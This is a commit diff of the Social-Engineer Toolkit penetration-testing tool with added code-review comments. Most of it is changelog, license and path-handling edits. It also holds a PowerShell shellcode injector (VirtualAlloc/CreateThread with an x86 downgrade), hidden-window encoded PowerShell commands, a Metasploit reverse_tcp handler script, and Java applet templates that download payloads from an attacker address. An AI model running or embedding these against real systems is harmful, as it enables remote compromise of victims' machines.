Updated a number of features

This commit is contained in:
TrustedSec 2014-06-02 10:10:11 -04:00
parent 30fbc15dbe
commit ca9f1fb2cf
11 changed files with 49 additions and 38 deletions

View file

@ -5,8 +5,6 @@ Written by: David Kennedy (ReL1K)
Company: [TrustedSec](https://www.trustedsec.com) Company: [TrustedSec](https://www.trustedsec.com)
Development Team: Thomas Werth, Joey Furr (j0fer), JR DePre (pr1me)
DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes period. DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes period.
Please read the LICENSE under readme/LICENSE for the licensing of SET. Please read the LICENSE under readme/LICENSE for the licensing of SET.
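Review bot: the "Development Team" credit is removed from the README here while the credits file in this same commit keeps those names under a new "Former Developers" heading; pick one place for that information so the two files do not drift. The disclaimer line would also read better as "Do not use this for illegal purposes, period."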
@ -23,5 +21,3 @@ For bug reports or enhancements, please open an issue here https://github.com/tr
- Linux - Linux
- Windows (experimental) - Windows (experimental)

View file

@ -1,3 +1,17 @@
~~~~~~~~~~~~~~~~
version 6.0.2
~~~~~~~~~~~~~~~~
* changed powershell injection technique to not exitonsession when creating the metasploit.rc file when specified in the powershell menu, this was already enabled when using psexec or other methods
* shrunk the powershell injection code command, not as much length needed - useful for shorter payloads
* slimmed down actual encoded powershell injection code, removed un-used code from the central powershell routine
* fixed a few typos and alignment on licensing agreement within SET and minor silly modifications to license
* fixed coloring when exiting and alignment for purpose of good disclaimer
* added print_status to bleeding edge tracking
* fixed unresponsive powershell injection when uses windows 8
* changed java applet user agent string inside applet to evade java blockers
* removed old ID and value parameters from the Java Applet database, no longer used based on changes through Java 7 update 42 - SET now uses manifest files
~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~
version 6.0.1 version 6.0.1
~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~
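Review bot: two typos in the new 6.0.2 entries: "fixed unresponsive powershell injection when uses windows 8" should read "when used on Windows 8", and "un-used" should be "unused". It would also help future readers if each bullet named the file or function it touched (for example set.py for the exit coloring fix, setcore.py for the print_status change), since the entries currently cannot be matched to hunks without reading the whole diff.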

View file

@ -62,6 +62,9 @@ Special thanks to the following people who have contributed to SET:
The Social-Engineer Development Team: The Social-Engineer Development Team:
Dave Kennedy (ReL1K) Dave Kennedy (ReL1K)
Former Developers on SET:
JR DePre (pr1me) JR DePre (pr1me)
Thomas Werth Thomas Werth
Joey Furr (j0fer) Joey Furr (j0fer)
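Review bot: the new "Former Developers on SET:" heading is inserted directly under the current team list with no blank line between the two sections, so the rendered file reads as one continuous list; add a separator line so the distinction between current and former developers is visible.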

View file

@ -1,27 +1,17 @@
Copyright 2013, The Social-Engineer Toolkit (SET) by TrustedSec, LLC Copyright 2014, The Social-Engineer Toolkit (SET) by TrustedSec, LLC
All rights reserved. All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
in the documentation and/or other materials provided with the distribution. * Neither the name of Social-Engineer Toolkit nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
* Neither the name of Social-Engineer Toolkit nor the names of its contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit as well. The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit as well.
Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-source application. Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-source application.
Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit is due (which means giving the authors the credit they deserve for writing it). Also note that by using this software, if you ever see the creator of SET in a bar, you should give him a hug and buy him a beer. Hug must last at least 5 seconds. Author holds the right to refuse the hug (most likely will never happen) or the beer (also most likely will never happen).
is due (which means giving the authors the credit they deserve for writing it). Also note that by using this software, if you ever
see the creator of SET in a bar, you should give him a hug and buy him a beer. Hug must last at least 5 seconds. Author
holds the right to refuse the hug or the beer.
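Review bot: the copyright year is replaced ("Copyright 2013" becomes "Copyright 2014") rather than extended; the usual form is "Copyright 2013-2014" so the original year is not lost. The rewrap of each license paragraph onto a single long line also turns a two-line touch into a whole-paragraph change in the diff; keeping the wrapped layout would make future edits to the license reviewable line by line.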

View file

@ -145,9 +145,7 @@ try:
print line.rstrip() print line.rstrip()
print bcolors.RED + """ print bcolors.RED + """
The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.""" + bcolors.GREEN
not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting
yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.""" + bcolors.GREEN
choice = raw_input("\nDo you agree to the terms of service [y/n]: ") choice = raw_input("\nDo you agree to the terms of service [y/n]: ")
if choice == "yes" or choice == "y": if choice == "yes" or choice == "y":
filewrite = file("src/agreement4", "w") filewrite = file("src/agreement4", "w")
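Review bot: the agreement check at `if choice == "yes" or choice == "y":` is case-sensitive, so a user typing "Y" or "YES" at a prompt that advertises "[y/n]" is treated as declining and the tool exits; normalise with `choice.strip().lower()` before comparing. The `file(...)` builtin is also Python 2 only; `open(...)` works on both and reads better.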
@ -155,7 +153,7 @@ yes (only one time), you agree to the terms of service and that you will only us
filewrite.close() filewrite.close()
print bcolors.ENDC print bcolors.ENDC
else: else:
print "[!] Exiting the Social-Engineer Toolkit, have a nice day." + bcolors.ENDC print bcolors.ENDC + "[!] Exiting the Social-Engineer Toolkit, have a nice day." + bcolors.ENDC
sys.exit() sys.exit()
while 1: while 1:

View file

@ -24,6 +24,7 @@ try:
from Crypto.Cipher import AES from Crypto.Cipher import AES
except ImportError: except ImportError:
print "[!] The python-pycrypto python module not installed. You will lose the ability for encrypted communications." print "[!] The python-pycrypto python module not installed. You will lose the ability for encrypted communications."
pass pass
@ -229,7 +230,7 @@ def print_error(message):
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
def get_version(): def get_version():
define_version = '6.0' define_version = '6.0.2'
return define_version return define_version
class create_menu: class create_menu:
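Review bot: the version string is now maintained by hand in two places, `define_version = '6.0.2'` here and the "version 6.0.2" header in the changelog, and the previous value ('6.0') shows they had already drifted from 6.0.1. Consider a single source, for example reading the version from one constant or file that both the banner and the changelog tooling use.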
@ -277,11 +278,13 @@ def meta_path():
else: msf_path = msf_path + "/" else: msf_path = msf_path + "/"
trigger = 0 trigger = 0
if not os.path.isdir(msf_path): if not os.path.isdir(msf_path):
# specific for kali linux # specific for kali linux
if os.path.isfile("/opt/metasploit/apps/pro/msf3/msfconsole"): if os.path.isfile("/opt/metasploit/apps/pro/msf3/msfconsole"):
msf_path = "/opt/metasploit/apps/pro/msf3/" msf_path = "/opt/metasploit/apps/pro/msf3/"
trigger = 1 trigger = 1
# specific for backtrack5
# specific for backtrack5 and other backtrack versions
if os.path.isfile("/opt/framework3/msf3/msfconsole"): if os.path.isfile("/opt/framework3/msf3/msfconsole"):
msf_path = "/opt/framework3/msf3/" msf_path = "/opt/framework3/msf3/"
trigger = 1 trigger = 1
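Review bot: the detection blocks in `meta_path()` are independent `if` statements that each overwrite `msf_path` and set `trigger = 1`, so on a host that has both `/opt/metasploit/apps/pro/msf3/msfconsole` and `/opt/framework3/msf3/msfconsole` the later check silently wins; use `elif` (or return on the first match) so the precedence is explicit. The comment change to "backtrack5 and other backtrack versions" is fine.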
@ -294,6 +297,7 @@ def meta_path():
if os.path.isfile("/usr/bin/msfconsole"): if os.path.isfile("/usr/bin/msfconsole"):
msf_path = "" msf_path = ""
trigger = 1 trigger = 1
# specific for pwnpad and pwnplug (pwnie express) # specific for pwnpad and pwnplug (pwnie express)
if os.path.isfile("/opt/metasploit-framework/msfconsole"): if os.path.isfile("/opt/metasploit-framework/msfconsole"):
msf_path = "/opt/metasploit-framework" msf_path = "/opt/metasploit-framework"
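Review bot: the hard-coded paths are inconsistent about the trailing slash: `"/opt/metasploit-framework"` has none while `"/opt/framework3/msf3/"` and `"/opt/metasploit/apps/pro/msf3/"` end in "/", and the `/usr/bin` case sets `msf_path = ""`. Any caller that builds `"%s/msfconsole" % msf_path` therefore gets "//msfconsole" for some installs and "/msfconsole" for the empty one; normalising the stored value (for example with `os.path.join`, or always storing the full path to the msfconsole binary) would remove the guesswork.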
@ -307,6 +311,8 @@ def meta_path():
print_error("Please configure in the config/set_config.") print_error("Please configure in the config/set_config.")
return_continue() return_continue()
return False return False
# if we are using windows
if check_os() == "windows": if check_os() == "windows":
print_warning("Metasploit payloads are not currently supported. This is coming soon.") print_warning("Metasploit payloads are not currently supported. This is coming soon.")
msf_path = "" msf_path = ""
@ -425,6 +431,8 @@ def bleeding_edge():
print_status("Bleeding edge already active..Moving on..") print_status("Bleeding edge already active..Moving on..")
subprocess.Popen("apt-get update;apt-get upgrade -f -y --force-yes;apt-get dist-upgrade -f -y --force-yes;apt-get autoremove -f -y --force-yes", shell=True).wait() subprocess.Popen("apt-get update;apt-get upgrade -f -y --force-yes;apt-get dist-upgrade -f -y --force-yes;apt-get autoremove -f -y --force-yes", shell=True).wait()
return True return True
# else lets add them if they want
else: else:
print_status("Adding Kali bleeding edge to sources.list for updates.") print_status("Adding Kali bleeding edge to sources.list for updates.")
# we need to add repo to kali file # we need to add repo to kali file
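Review bot: the `apt-get ... --force-yes` chain in this hunk tells apt to proceed past its safeguards, including installing packages that fail signature verification, which is a supply-chain risk on the update path of a tool that is itself run as root; `-y` alone answers the prompts, and a failed `apt-get update` should stop the chain rather than continue into `dist-upgrade`. The added "# else lets add them if they want" comment is fine.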
@ -451,6 +459,7 @@ def update_set():
time.sleep(2) time.sleep(2)
bleeding_edge() bleeding_edge()
# if we aren't running Kali :(
else: else:
peinr_info("Kali-Linux not detected, manually updating..") peinr_info("Kali-Linux not detected, manually updating..")
print_info("Updating the Social-Engineer Toolkit, be patient...") print_info("Updating the Social-Engineer Toolkit, be patient...")
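Review bot: `peinr_info("Kali-Linux not detected, manually updating..")` is a typo for `print_info` that survives this hunk unchanged; on any non-Kali system the `else` branch raises `NameError` before the update runs. Since the commit adds the "# if we aren't running Kali :(" comment on exactly this branch, it is worth fixing the call in the same change.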
@ -1245,8 +1254,10 @@ def generate_powershell_alphanumeric_payload(payload,ipaddr,port, payload2):
# heres our shellcode prepped and ready to go # heres our shellcode prepped and ready to go
shellcode = newdata[:-1] shellcode = newdata[:-1]
# powershell command here, needs to be unicoded then base64 in order to use encodedcommand - this incorporates a new process downgrade attack where if it detects 64 bit it'll use x86 powershell. This is useful so we don't have to guess if its x64 or x86 and what type of shellcode to use # powershell command here, needs to be unicoded then base64 in order to use encodedcommand - this incorporates a new process downgrade attack where if it detects 64 bit it'll use x86 powershell. This is useful so we don't have to guess if its x64 or x86 and what type of shellcode to use
powershell_command = (r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = %s;$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";$cmd = "-nop -noni -enc ";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";}""" % (shellcode)) powershell_command = (r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = %s;$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = 
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";$cmd = "-nop -noni -enc ";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";}""" % (shellcode))
# unicode and base64 encode and return it # unicode and base64 encode and return it
return base64.b64encode(powershell_command.encode('utf_16_le')) return base64.b64encode(powershell_command.encode('utf_16_le'))
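Review bot: the only visible change in this hunk is a line break inside the raw triple-quoted string; the content on both sides is identical. If this is the "shrunk the powershell injection code command" item from the changelog, the visible diff does not shorten anything, so either the changelog entry refers to another function or the intended change did not land. A comment documenting the expected shape of the `shellcode` value substituted via `%s` would also help, since the string only works if that value is already formatted for the `[Byte[]]$sc = ...` assignment.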
@ -1261,7 +1272,6 @@ def generate_shellcode(payload,ipaddr,port):
repls = {';' : '', ' ' : '', '+' : '', '"' : '', '\n' : '', 'unsigned char buf=' : '', 'unsignedcharbuf[]=' : ''} repls = {';' : '', ' ' : '', '+' : '', '"' : '', '\n' : '', 'unsigned char buf=' : '', 'unsignedcharbuf[]=' : ''}
data = reduce(lambda a, kv: a.replace(*kv), repls.iteritems(), data).rstrip() data = reduce(lambda a, kv: a.replace(*kv), repls.iteritems(), data).rstrip()
# return data # return data
print data
return data return data
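Review bot: removing the stray `print data` debug line is right; the commented-out `# return data` directly above the real `return data` is dead text left over from the same debugging session and should go with it.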
# this will take input for shellcode and do a replace for IP addresses # this will take input for shellcode and do a replace for IP addresses
@ -1602,18 +1612,18 @@ def bleeding_edge():
# first check if we are actually using Kali # first check if we are actually using Kali
kali = check_kali() kali = check_kali()
if kali == "Kali": if kali == "Kali":
print "[*] Checking to see if bleeding-edge repos are active." print_status("Checking to see if bleeding-edge repos are active.")
# check if we have the repos enabled first # check if we have the repos enabled first
fileopen = file("/etc/apt/sources.list", "r") fileopen = file("/etc/apt/sources.list", "r")
kalidata = fileopen.read() kalidata = fileopen.read()
if "deb http://repo.kali.org/kali kali-bleeding-edge main" in kalidata: if "deb http://repo.kali.org/kali kali-bleeding-edge main" in kalidata:
print "[*] Bleeding edge already active..Moving on.." print_status("Bleeding edge already active..Moving on..")
return True return True
else: else:
print "[!] Bleeding edge repos were not detected. This is recommended." print_warning("Bleeding edge repos were not detected. This is recommended.")
enable = raw_input("Do you want to enable bleeding-edge repos for fast updates [yes/no]: ") enable = raw_input("Do you want to enable bleeding-edge repos for fast updates [yes/no]: ")
if enable == "y" or enable == "yes": if enable == "y" or enable == "yes":
print "[*] Adding Kali bleeding edge to sources.list for updates." print_status("Adding Kali bleeding edge to sources.list for updates.")
# we need to add repo to kali file # we need to add repo to kali file
# we will rewrite the entire apt in case not all repos are there # we will rewrite the entire apt in case not all repos are there
filewrite = file("/etc/apt/sources.list", "w") filewrite = file("/etc/apt/sources.list", "w")
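Review bot: this module defines `bleeding_edge()` twice (the hunk headers show one at line 425 and another at line 1602), and in Python the later definition silently replaces the earlier one at import time, so only one of the two bodies being edited here is ever called; merge them into one function. The print_status/print_warning replacements are fine. Separately, `file("/etc/apt/sources.list", "w")` rewrites the user's entire sources list from scratch (as the comment admits), discarding any entries they added; dropping a file into `/etc/apt/sources.list.d/` instead adds the repo without destroying existing configuration.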

View file

@ -183,7 +183,7 @@ def deploy_hex2binary(ipaddr,port,username,password):
x86 = file(setdir + "/x86.powershell", "r") x86 = file(setdir + "/x86.powershell", "r")
x86 = x86.read() x86 = x86.read()
x86 = "powershell -nop -win hidden -noni -enc " + x86 x86 = "powershell -nop -win hid -noni -enc " + x86
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir)) print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w") filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86) filewrite.write(x86)
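Review bot: `x86 = file(setdir + "/x86.powershell", "r")` followed by `x86 = x86.read()` rebinds the name and drops the file handle without ever closing it; use `with open(...) as f: x86 = f.read()`. The same pattern is repeated for `filewrite`, whose `close()` is not visible in this hunk.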

View file

@ -64,7 +64,7 @@ try:
x86 = file(setdir + "/x86.powershell", "r") x86 = file(setdir + "/x86.powershell", "r")
x86 = x86.read() x86 = x86.read()
x86 = "powershell -nop -window hidden -noni -enc " + x86 x86 = "powershell -nop -win hid -noni -enc " + x86
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir)) print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w") filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86) filewrite.write(x86)
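Review bot: this five-line block (read x86.powershell, prefix the powershell command line, announce the export path, write the report file) is duplicated verbatim across three files in this commit, which is why the same flag change had to be made three times with three different original spellings ("-win hidden", "-window hidden", "-windows hidden"). Factoring it into one helper in setcore would make the next such change a single edit.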

View file

@ -40,7 +40,7 @@ if powershell_menu_choice != "99":
# here we format everything for us # here we format everything for us
x86 = file(setdir + "/x86.powershell", "r") x86 = file(setdir + "/x86.powershell", "r")
x86 = x86.read() x86 = x86.read()
x86 = "powershell -nop -windows hidden -noni -enc " + x86 x86 = "powershell -nop -win hid -noni -enc " + x86
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir)) print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w") filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86) filewrite.write(x86)
@ -53,7 +53,7 @@ if powershell_menu_choice != "99":
# if we want to start the listener # if we want to start the listener
if choice == 'YES': if choice == 'YES':
filewrite = file(setdir + "/reports/powershell/powershell.rc", "w") filewrite = file(setdir + "/reports/powershell/powershell.rc", "w")
filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset lport %s\nset LHOST 0.0.0.0\nexploit -j" % (port)) filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset LPORT %s\nset LHOST 0.0.0.0\nset ExitOnSession false\nexploit -j" % (port))
filewrite.close() filewrite.close()
msf_path = meta_path() msf_path = meta_path()
subprocess.Popen("ruby %s/msfconsole -L -r %s/reports/powershell/powershell.rc" % (msf_path, setdir), shell=True).wait() subprocess.Popen("ruby %s/msfconsole -L -r %s/reports/powershell/powershell.rc" % (msf_path, setdir), shell=True).wait()
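Review bot: `"ruby %s/msfconsole -L -r %s/reports/powershell/powershell.rc" % (msf_path, setdir)` breaks when `meta_path()` returns `""` for a `/usr/bin/msfconsole` install, since the command becomes `ruby /msfconsole ...`; it also yields `//msfconsole` for the detected paths that end in "/". Build the binary path with `os.path.join` or have `meta_path()` return the full path to msfconsole. The `set ExitOnSession false` addition matches the changelog and the `exploit -j` that follows it; the `lport` to `LPORT` change is cosmetic but consistent with `LHOST`.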

View file

@ -1 +1 @@
<applet code="Java.class" width="1" height="1" id="IDREPLACEHERE" archive="Signed_Update.jar"><param name="name" value="IDREPLACEHERE"><param name="1" value="http://ipaddrhere/msf.exe"><param name="2" value=""><param name="3" value="http://ipaddrhere/mac.bin"><param name="4" value="http://ipaddrhere/nix.bin"><param name="5" value=""><param name="6" value=""><param name="7" value="freehugs"><param name="8" value="YES"><param name="9" value=""><param name="10" value=""><param name="separate_jvm" value="true"></applet> <applet code="Java.class" width="1" height="1" archive="Signed_Update.jar"><param name="name"><param name="1" value="http://ipaddrhere/msf.exe"><param name="2" value=""><param name="3" value="http://ipaddrhere/mac.bin"><param name="4" value="http://ipaddrhere/nix.bin"><param name="5" value=""><param name="6" value=""><param name="7" value="freehugs"><param name="8" value="YES"><param name="9" value=""><param name="10" value=""><param name="separate_jvm" value="true"></applet>
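Review bot: `<param name="name">` on the new side has lost its `value` attribute but was not removed, so it is now a param with a name and no value, which is the leftover of deleting the `IDREPLACEHERE` value; drop the whole `<param>` element together with the `id` attribute rather than leaving it half-removed.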

View file

@ -1 +1 @@
<applet width="1" height="1" id="IDREPLACEHERE" code="Java.class" archive="Signed_Update.jar"><param name="WINDOWSPLZ" value="http://ipaddrhere/msf.exe"><param name="ILIKESTUFF" value=""><param name="OSX" value="http://ipaddrhere/mac.bin"><param name="LINUX" value="http://ipaddrhere/nix.bin"><param name="X64" value=""><param name="X86" value=""><param name="HUGSNOTDRUGS" value="freehugs"><param name="LAUNCH" value="YES"><param name="nextPage" value=""><param name="separate_jvm" value="true"></applet> <applet code="Java.class" width="1" height="1" id="IDREPLACEHERE" archive="Signed_Update.jar"><param name="name" value="IDREPLACEHERE"><param name="1" value="http://ipaddrhere/msf.exe"><param name="2" value=""><param name="3" value="http://ipaddrhere/mac.bin"><param name="4" value="http://ipaddrhere/nix.bin"><param name="5" value=""><param name="6" value=""><param name="7" value="freehugs"><param name="8" value="YES"><param name="9" value=""><param name="10" value=""><param name="separate_jvm" value="true"></applet>
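Review bot: this hunk goes in the opposite direction from the previous applet file: its new side reintroduces `id="IDREPLACEHERE"` and `<param name="name" value="IDREPLACEHERE">`, which the previous hunk just removed, while the changelog says the old ID and value parameters were removed from the applet database. Check which of the two versions is the intended one and apply it to both files so the two applet templates agree.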